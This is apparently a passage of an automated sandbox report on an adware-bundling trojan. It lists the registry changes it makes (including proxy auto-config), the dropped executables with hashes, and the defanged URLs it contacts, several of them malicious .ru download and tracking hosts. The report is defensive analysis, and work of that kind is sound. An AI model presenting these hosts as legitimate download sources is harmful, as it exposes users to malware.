[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"rerunbig"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\advPlugin]
"Uninstalled"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"Uninstalled"

The process ExtensionUpdaterService.exe:2632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"isFirstRunUpdater" = "0"

Dropped PE files

MD5	File path
13de862aeb07818ba42671ef8efcae13	c:\Program Files (x86)\Opera\27.0.1689.69\d3dcompiler_46.dll
53b707547eefa5912dc29d3ad8ea1b00	c:\Program Files (x86)\Opera\27.0.1689.69\ffmpegsumo.dll
3fd264aeb5fac304deb165645b170d90	c:\Program Files (x86)\Opera\27.0.1689.69\installer.exe
c6cfa2497427027f64507b39e99727a3	c:\Program Files (x86)\Opera\27.0.1689.69\launcher_lib.dll
d1e50834d87e66f9d43631f82af15183	c:\Program Files (x86)\Opera\27.0.1689.69\libEGL.dll
9dbba32c475409829503e1cdc6825615	c:\Program Files (x86)\Opera\27.0.1689.69\libGLESv2.dll
2edbf97e436f745d7156d24f45529916	c:\Program Files (x86)\Opera\27.0.1689.69\message_center_win8.dll
f4e4cefb6512c5b2517a75433767adf7	c:\Program Files (x86)\Opera\27.0.1689.69\msvcp100.dll
3919dde594c8d7c3e60395d2cd8f6a76	c:\Program Files (x86)\Opera\27.0.1689.69\msvcr100.dll
281a5357c0a821221b1718901106c18f	c:\Program Files (x86)\Opera\27.0.1689.69\opera.exe
c93a90aa5b17469b7f0a71fdfa78093a	c:\Program Files (x86)\Opera\27.0.1689.69\opera_autoupdate.exe
c9a84f86dd4b2f69e7b691a1972a0439	c:\Program Files (x86)\Opera\27.0.1689.69\opera_crashreporter.exe
7b356f85a70e824c37c023932d34f09e	c:\Program Files (x86)\Opera\27.0.1689.69\osmesa.dll
5d25c2e2f44aa31d3357f7d150b6ce65	c:\Program Files (x86)\Opera\27.0.1689.69\pdf.dll
dc5c1cbe03ba0455e34fcc7c566e8a71	c:\Program Files (x86)\Opera\27.0.1689.69\win8_importing.dll
c0e2fa6b29cff30be6f3a41cc312b7f3	c:\Program Files (x86)\Opera\27.0.1689.69\wow_helper.exe
916b93ae763517565093ebe0f32b6604	c:\Program Files (x86)\Opera\launcher.exe
315cacc4577241063a34d47b876e3870	c:\Program Files (x86)\advPlugin\BackgroundSingleton.exe
6459763505ef9667fd1003b6edaade41	c:\Program Files (x86)\advPlugin\Basement\ExtensionUpdaterService.exe
27ff1eb15482b9567babe3b617fda6ac	c:\Program Files (x86)\advPlugin\Interfaces32.dll
28d0a63287b453407eccbd05ff0f0352	c:\Program Files (x86)\advPlugin\Interfaces64.dll
38972533676f9b746943c60dfe0c054c	c:\Program Files (x86)\advPlugin\Loader.exe
e87fdc51daf96b01b09cd9ce25cb74e6	c:\Program Files (x86)\advPlugin\Toolbar32.dll
f1551de7a0ae7321a79625dbebe42e8c	c:\Program Files (x86)\advPlugin\Toolbar64.dll
a0fd1ae038bb2b41bdee325f89c1c259	c:\Program Files (x86)\advPlugin\Uninstaller.exe
022951cd80e6b6349050f2e525f87209	c:\Program Files (x86)\advPlugin\uninstall.exe
4e90426ff1d88920b01fa21fb4154dd3	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Opera_27.0.1689.69_Setup[1].exe
37500ff6fc6c395916e1b7227b8791c8	c:\Users\"%CurrentUserName%"\AppData\Local\SystemDir\nethost.exe
2937e29c43a65938cb46b8e76558222f	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Df6Dtkv9LPdV.exe
7fba3fab7114938e823e5c9569b4755b	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\JUR0CxdplxCY.exe
f559ddd5ecfeb426dc00c567b9dd0cee	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\M4qMs9te1cPN.exe
3d7b0f2a8aed2619867c64588bec38c2	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\bAQhdcvmXpIk.exe
8243f052affe56169e67bf486a7c2bd1	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\Chromium.dll
bc2692ec200f6926a3f397afa85279f8	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\InstallerHelper.dll
1bccd5ced6080035db3457e533576089	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\KompexSQLiteWrapper.dll
7c7486d68c1f3990fbe7a17907fffac0	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\nsProcess.dll
37500ff6fc6c395916e1b7227b8791c8	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\rW6IhvkK2QUK.exe
f559ddd5ecfeb426dc00c567b9dd0cee	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\w0jKC6uoKzUY.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	526695	526848	4.61889	6f1c4bf5e7b06514dc7fcf0875d7e901
.rsrc	532480	78644	78848	2.20364	3eb42d567aa1539846658e4e6d23b40e
.idata	614400	1964	2048	3.39277	b147e99db8c37a95ec8534884a63b7f1
.zsyh	618496	30813	31232	3.10635	87db6f43b674e0408f6cf0bb528265ea
.tcn	651264	31449	31744	3.12821	c484cb1a7aba9689e7cde3357791e474
.ceie	684032	12741	12800	3.12856	4a74dfc1efa942bb939e53aced0e742e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://forces.prochristmasdom.ru/get_json?stb=1&did=1497824015&ext_partner_id=&file_id=32888998&rnd=399f10466aadb4ab46aee8d444f5554534411947cf39dabc663334b4ef7e4f1d
hxxp://forces.prochristmasdom.ru/get_json?stb=1&did=1497824015&ext_partner_id=&file_id=32888998&rnd=399f10466aadb4ab46aee8d444f5554534411947cf39dabc663334b4ef7e4f1d&delay=3463
hxxp://6.bezsms.org/files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip
hxxp://illespi.dom-upload.ru/Opera.png
hxxp://forces.prochristmasdom.ru/delay?time=0&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://forces.prochristmasdom.ru/touch_install?name=Opera_ua.exe&hash=f0b99c0b0e005bdb5acb5ad7f2d77fd8c8f041abf8e4f52d8a529908c7321011&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://eu.net.opera.com/opera/stable?utm_medium=pb&utm_source=turbo&utm_campaign=turbo_newNI
hxxp://forces.prochristmasdom.ru/launch_install?name=Opera_ua.exe&hash=f0b99c0b0e005bdb5acb5ad7f2d77fd8c8f041abf8e4f52d8a529908c7321011&md5=2937e29c43a65938cb46b8e76558222f&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8fecbf530911d77c
hxxp://cs9.wac.edgecastcdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8=
hxxp://cs9.wac.edgecastcdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY+sl+j4yzQuAcL2oQno5fCgQUUWj/kK8CB3U8zNllZGKiErhZcjsCEArKdNViqZvRTsj6pSQqLDU=
hxxp://www.route53.opera.com/download/get/?id=38020&autoupdate=1&ni=1&stream=stable&utm_source=turbo&utm_campaign=turbo_newNI&utm_medium=pb&niuid=dd1a4d0e-56b7-42dc-b0d5-e49130159c6f
hxxp://pc-b.bitgravity.com/pub/opera/desktop/27.0.1689.69/win/Opera_27.0.1689.69_Setup.exe
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j+ApJVk=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHHKyY9lBgWVXZrYbPK9VrY=
hxxp://forces.prochristmasdom.ru/file_error?type=download&descr=User abort (info event)&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://www.google.com/favicon.ico
hxxp://autoupdate.geo.opera.com/geolocation/
hxxp://any.edge.bing.com/s/a/bing_p.ico
hxxp://bits.wikimedia.org/favicon/wikipedia.ico
hxxp://www.amazon.com/favicon.ico
hxxp://redir.opera.com/www.opera.com/firstrun/?utm_source=turbo&utm_campaign=turbo_newNI&utm_medium=pb
hxxp://sitecheck2.opera.com/?host=redir.opera.com&hdn=H0WKpMbVXsif0I8OJoRVZA==
hxxp://forces.vseturbo.ru/software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&hash=HASH&file_id=32888998&did=1497824015&ext_partner_id=&Opera_ua=1
hxxp://cs9.wac.edgecastcdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh/sBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAaeHbd/zx37qXr15cmiQDc=
hxxp://cs9.wac.edgecastcdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQgppSLAb7oJaQ6RVV2Zh9VwZIGMwQUkHHbN+tzyO/c1R4StjS6K1qgppICEAt9kXTqajTaLH9Ahr8T1UU=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEG7MeqWnAyAJuM689OlS1JE=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEBJb7jD8sX/Xvx/0GcknQyc=
hxxp://redir.opera.com/speeddials/partner/facebook
hxxp://redir.opera.com/speeddials/partner/amazon_us
hxxp://redir.opera.com/speeddials/partner/ebay_us
hxxp://redir.opera.com/speeddials/partner/yahoo
hxxp://redir.opera.com/speeddials/partner/twitter_us
hxxp://redir.opera.com/speeddials/partner/youtube
hxxp://redir.opera.com/speeddials/partner/product
hxxp://redir.opera.com/speeddials/partner/booking_com_us
hxxp://redir.opera.com/speeddials/partner/wikipedia_org_us
hxxp://redir.opera.com/previews/images/facebook_other/sd.png
hxxp://redir.opera.com/previews/images/amazon_us/sd.png
hxxp://redir.opera.com/previews/images/ebay_us/sd.png
hxxp://redir.opera.com/previews/images/yahoo_other/sd.png
hxxp://redir.opera.com/previews/images/twitter_us/sd.png
hxxp://redir.opera.com/previews/images/youtube_other/sd.png
hxxp://redir.opera.com/previews/images/product/sd.png
hxxp://redir.opera.com/previews/images/booking_com_us/sd.png
hxxp://redir.opera.com/previews/images/wikipedia_org_us/sd.png
hxxp://cs9.wac.edgecastcdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEApfEU0DWxeRF9Lv1AOMPzs=
hxxp://cs9.wac.edgecastcdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTtSK3dy3sA4g6EKqm0CfGsMDTPlgQUUOpzidsp+xCPnuUBINTeeZlIg/cCEAFxUrzHYO3GFd2OT1fIbA8=
hxxp://www.amazon.com/?tag=operadesktop14-sd-us-20
hxxp://rover.g.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574672411&toolid=10001&campid=5337314645&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg
hxxp://e9428.b.akamaiedge.net/?rmvSB=true
hxxp://e9428.b.akamaiedge.net/favicon.ico
hxxp://fd-fp3.wg1.b.yahoo.com/?ilc=400
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEElf2B2zS0yDvnMYzCuOCTI=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEH7hSm9v7/LTfz+tZU062rQ=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR0JBRnBp/14Jg/Xj4aa6BlKlQVdQQUAVmr5906C1mmZGPWzyAHV9WR52oCEBrIXreuw1E82A2FOF7P0gg=
hxxp://youtube-ui.l.google.com/
hxxp://e6845.ce.akamaiedge.net/crls/secureca.crl
hxxp://e8218.ce.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6dg==
hxxp://youtube-ui.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCASLFcOoMN4Y
hxxp://www.route53.opera.com/follow?utm_medium=speed_dial_thumbnail&utm_source=speed_dial_computer&utm_campaign=social_follow_us_page
hxxp://www.route53.opera.com/favicon.ico
hxxp://a1363.dscg.akamai.net/pki/crl/products/microsoftrootcert.crl
hxxp://a1363.dscg.akamai.net/pki/crl/products/WinPCA.crl
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?15377a6d967eaff9
hxxp://forces.prochristmasdom.ru/touch_install?name=homesearch.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=ff7d9019f9fb5697be04f7630fff268bf5dbad4a7293af5d273be3f397f08be4&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://moscow.cdnmail.ru/mailruhomesearchvbm.exe?rfr=blackbear1
hxxp://forces.prochristmasdom.ru/launch_install?name=homesearch.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=ff7d9019f9fb5697be04f7630fff268bf5dbad4a7293af5d273be3f397f08be4&md5=3d7b0f2a8aed2619867c64588bec38c2&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://mrds.mail.ru/update/2/version.txt?type=install&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&standalone=1&tool=sputnik&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=7&bgn=1
hxxp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj?osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&tool=sputnik&guid=&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=9
hxxp://mrds.mail.ru/update/2/version.txt?type=install&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&standalone=1&tool=sputnik&uacenabled=0&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=10&uacpass=1
hxxp://moscow.cdnmail.ru/go_chxtn4.7z
hxxp://moscow.cdnmail.ru/go_ffspt1.7z
hxxp://moscow.cdnmail.ru/go_chhp11956636.7z
hxxp://moscow.cdnmail.ru/go_chvbm6.7z
hxxp://moscow.cdnmail.ru/go_ffvbm1.7z
hxxp://mrds.mail.ru/update/2/version.txt?type=prog_set&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&tool=sputnik&target=ff&prog=xtn_vbm&event=done
hxxp://get.geo.opera.com/res/servicefiles/ca-revocation-lists/desktop/20140806-1.json
hxxp://get.geo.opera.com/res/servicefiles/browserjsfiles/json/desktop/browserjs-OPRDesktop-25.0-20150202.js
hxxp://fallback.global-ssl.fastly.net/res/servicefiles/sitepreference/siteprefs-desktop-1424440377.json
hxxp://fallback.global-ssl.fastly.net/res/servicefiles/ab-tests/20150113-4.json
hxxp://gs1.wac.v2cdn.net/baltimoreroot/MEUwQzBBMD8wPTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom/nYB45SPUEwQU5Z1ZMIJHWMys+ghUNoZ7OrUETfACBAcnqkc=
hxxp://hostedocsp.globalsign.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAHevvgBk+xJc0C0AAQAAd68=
hxxp://cs1.wpc.v0cdn.net/pki/mscorp/crl/msitwww2.crl
hxxp://forces.prochristmasdom.ru/touch_install?name=nethost.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=2d84e2b0951fc5429e36666fbea994a540c103d2f71235ccaa45e036691ac29a&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://illespi.dom-upload.ru/nethost.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://forces.prochristmasdom.ru/launch_install?name=nethost.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=2d84e2b0951fc5429e36666fbea994a540c103d2f71235ccaa45e036691ac29a&md5=37500ff6fc6c395916e1b7227b8791c8&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://gstinfo.ru/?prod=nethost&version=1.0.0.133&action=nethost_install&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=d1105d88a8f18473b0f9dc575db2eded
hxxp://forces.prochristmasdom.ru/touch_install?name=go_search_desktop.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=43dc7e69b16c87d642564ef4260203eb29efd0c7ef3e604b49815cb3e95dc36f&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://illespi.dom-upload.ru/go_search_desktop.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://forces.prochristmasdom.ru/launch_install?name=go_search_desktop.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=43dc7e69b16c87d642564ef4260203eb29efd0c7ef3e604b49815cb3e95dc36f&md5=f559ddd5ecfeb426dc00c567b9dd0cee&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://gstinfo.ru/?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_start&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=2f30dcb5fee49f267a17c01eac0c5821&guid=5838C925E41E4C3D96DAEE64DAAFF3A6
hxxp://illespi.dom-upload.ru/gosearch3.ico
hxxp://forces.vseturbo.ru/software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&guid=5838c925-e41e-4c3d-96da-ee64daaff3a6&sig=fc3c1ccad0768cd1c10bc55a9d24d4b0&ovr=0&file_id=32888998&did=1497824015&ext_partner_id=&go_search_desktop=1&ext_partner_id=
hxxp://gstinfo.ru/?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_success&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=7c01ff2c1ae698a011886c728c9d1fe1&guid=5838C925E41E4C3D96DAEE64DAAFF3A6
hxxp://forces.prochristmasdom.ru/touch_install?name=goinf_plugin_cis.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=3c36a3c897c868b2f0ab33ab9f46518e78ace6f39f0a90c4c9040819b0df80c2&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://illespi.dom-upload.ru/goinf_plugin_cis.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://installsyst.com/statistic/?status=run2&rand=938&GUID=127548203094016&browser=opera_27.0.1689.69
hxxp://mrds.mail.ru/update/2/version.txt?type=prog_set&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&tool=sputnik&target=op_start&prog=mail&target_ver=27.0.1689.69
hxxp://mrds.mail.ru/update/2/version.txt?type=prog_set&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&tool=sputnik&target=op_dial&prog=mail&target_ver=27.0.1689.69
hxxp://mrds.mail.ru/update/2/version.txt?type=install&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&success=1&tool=sputnik&ieovr=0&ffovr=1&ffvbm=0&br=opnew&brver=27.0&bfr=0&aftr=0&bfr2=&aftr2=
hxxp://installsyst.com/statistic/?status=stats&rand=938&GUID=127548203094016&softid=1&version=1.2.15&wid=1&subid1=1&subid2=1&browsers=chrome_35.0.1916.153,opera_27.0.1689.69,firefox_29.0.1,yandex_0.0.0.0,iexplorer_9.10.9200.16521
hxxp://forces.vseturbo.ru/software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&hash=HASH&file_id=32888998&did=1497824015&ext_partner_id=&goinf_plugin_cis=1
hxxp://go.mail.ru/?osd=1
hxxp://eu-ycpi-uno.aycpi.b.yahoodns.net/webservice/v1/symbols/allcurrencies/quote?format=json&random=0.44692643848247826
hxxp://go.mail.ru/static/common/img/favicon.ico
hxxp://redir.opera.com/speeddials/partner/yandex_ua
hxxp://mail.ru/cnt/10445?gp=blackbear1
hxxp://www.yandex.ua/?clid=9403
hxxp://redir.opera.com/speeddials/partner/yandex_mail_ua_uk
hxxp://redir.opera.com/speeddials/partner/yandex_maps_ua_uk
hxxp://redir.opera.com/speeddials/partner/aukro_ua
hxxp://redir.opera.com/speeddials/partner/booking_com_ua
hxxp://redir.opera.com/speeddials/partner/megogo_net_ua
hxxp://redir.opera.com/speeddials/partner/product_ua
hxxp://redir.opera.com/speeddials/partner/price_ua
hxxp://redir.opera.com/speeddials/partner/slando
hxxp://redir.opera.com/previews/images/yandex_ua/sd.png
hxxp://redir.opera.com/previews/images/yandex_mail_ua/sd.png
hxxp://redir.opera.com/previews/images/yandex_maps_ua/sd.png
hxxp://redir.opera.com/previews/images/aukro_ua/sd.png
hxxp://redir.opera.com/previews/images/booking_com_ua/sd.png
hxxp://redir.opera.com/previews/images/megogo_net_ua/sd.png
hxxp://redir.opera.com/previews/images/slando/sd.png
hxxp://redir.opera.com/previews/images/product_ua/sd.png
hxxp://redir.opera.com/previews/images/price_ua/sd.png
hxxp://mail.ru/
hxxp://e8218.ce.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6Yw==
hxxp://d1gbu8yzpfdsn2.cloudfront.net/CRL/class2.crl
hxxp://common.radar.imgsmail.ru/update?rnd=339811679857&p=gomail0&t=gomail_main&v=0
hxxp://go.imgsmail.ru/static/web/doodles/loader.css?5698926c
hxxp://go.imgsmail.ru/static/web/css/main.css?7bf07569
hxxp://go.imgsmail.ru/static/web/js/lib.js?fa064f74
hxxp://go.imgsmail.ru/static/web/js/base.js?2657ceda
hxxp://go.imgsmail.ru/static/web/js/adptest/advertisement.js?85071e6d
hxxp://go.imgsmail.ru/static/web/js/main.js?9990c3c3
hxxp://go.imgsmail.ru/static/web/js/portal_header/portal_header_0.1.33.js?274e8161
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEDe+2HQUBMnr81Cg/dygBNE=
hxxp://fallback.global-ssl.fastly.net/js/300/addthis_widget.js
hxxp://go.imgsmail.ru/static/web/css/opera_sd_style.css?c1f5832d
hxxp://go.mail.ru/static/web/img/opera_bookmark/sd_search_img.png
hxxp://go.imgsmail.ru/wallpapers/230215.jpg
hxxp://go.imgsmail.ru/0c.gif?megarandom=507f606c18792767&h=l
hxxp://eu-ycpi-uno.aycpi.b.yahoodns.net/webservice/v1/symbols/allcurrencies/quote?format=json&random=0.9386969780291706
hxxp://reklama.mail.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04agcEPWEcG8e1gW6bbHmwaRpGIMG6auKDGQxswDfur72lu0In0RlhwnEnLdlHL7W8
hxxp://mailua.hit.gemius.pl/redot.gif?id=nSc1Xb_XHWGE489G2VJWSZPcDkF6pA7KiGusxyUX4pH.Z7/tstamp=1424684153535
hxxp://www.tns-counter.ru/V13a**R>mail_ru/ru/UTF-8/tmsec=mail_go/93282204
hxxp://portal.mail.ru/NaviData?mac=1&gamescnt=1&rnd=1424684153609
hxxp://img.imgsmail.ru/p/h/d/0.34.11/external.min.js
hxxp://go.imgsmail.ru/static/web/img/icons/ico_search.png
hxxp://go.mail.ru/static/web/img/logotype-go.png
hxxp://common.radar.imgsmail.ru/update?rnd=410912142275&p=gomail&t=gomail_main&v=782
hxxp://common.radar.imgsmail.ru/update?rnd=451798608657&p=gomail3&t=gomail_main&v=0&i=renderdocument:782,static:550,jsinit:1
hxxp://mail.yandex.ru/?from=dist_svz
hxxp://top-fwz1.mail.ru/js/code.js
hxxp://counter.yadro.ru/hit?r;s171690124;uhttp://go.mail.ru/?osd=1;0.6857750520575792
hxxp://top-fwz1.mail.ru/counter?id=631797;;r=;j=true;s=1716*901;d=24;rand=0.2730049511883408
hxxp://img.imgsmail.ru/p/pm/d/0.1.33/blocks/ph-icons/ph-icons.png
hxxp://fallback.global-ssl.fastly.net/static/r07/core201.js
hxxp://counter.yadro.ru/hit?q;r;s171690124;uhttp://go.mail.ru/?osd=1;0.6857750520575792
hxxp://www.tns-counter.ru/V13b**R>mail_ru/ru/UTF-8/tmsec=mail_go/93282204
hxxp://top-fwz1.mail.ru/counter?js=13;id=48844;u=http://go.mail.ru/?osd=1;st=1424684153747;title=ÐŸÐ¾Ð¸ÑÐº Mail.Ru;s=1716901;vp=1008756;touch=0;hds=1;flash=;sid=e74b9f5c;ver=60;nt=0/0/1424684151577/////1286/1286/1286/1286/1286//1289/1338/1396/1348/2189/2189/2483///;_=0.026122240349650383
hxxp://bs.yandex.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,,1961059298
hxxp://bar.love.mail.ru/jsonp/bar?rnd=1424684154316
hxxp://ok.ru/mapi?query={"cmd":"getCounters"}&callback=__PHJSONPCallback_0&rnd=1424684154318
hxxp://fallback.global-ssl.fastly.net/static/r07/widget/css/widget015.top.svg.css
hxxp://reklama.mail.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,2579112161391436322,3896980131
